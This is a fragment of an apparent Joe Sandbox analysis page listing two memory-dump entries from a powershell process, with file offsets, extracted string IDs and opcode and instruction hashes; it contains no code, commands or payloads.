                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$tP^q$(dq$(dq
                                                      • API String ID: 0-152831182
                                                      • Opcode ID: 215f019331bd1270ab7885b60c1c921a1182edf698ffe935a12d3360f29e25d9
                                                      • Instruction ID: ae12b52cd5b4c00f6064bab51410c19dabd636b1c3fcc3c073996f98d69e3692
                                                      • Opcode Fuzzy Hash: 215f019331bd1270ab7885b60c1c921a1182edf698ffe935a12d3360f29e25d9
                                                      • Instruction Fuzzy Hash: 8F2149B0600111EBCB3A8E10D864BEBBBA1AB45710F24444FE9A35B381C6719D4BC791
                                                      Function 074D2B39 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-2049395529
                                                      • Opcode ID: cc65f9bba7d000f4ee765132426ba15df5dcda6c4c6880a42fc8df1bbf73d663
                                                      • Instruction ID: d0b36822c97416dcaa3419e5d9a3aee131ea118d10f78a7192c8f2c99042b994
                                                      • Opcode Fuzzy Hash: cc65f9bba7d000f4ee765132426ba15df5dcda6c4c6880a42fc8df1bbf73d663
                                                      • Instruction Fuzzy Hash: 5101D4617093956FC32B1A2818305B76FB69FC761071A48DBC080CF357CD998C8A83B2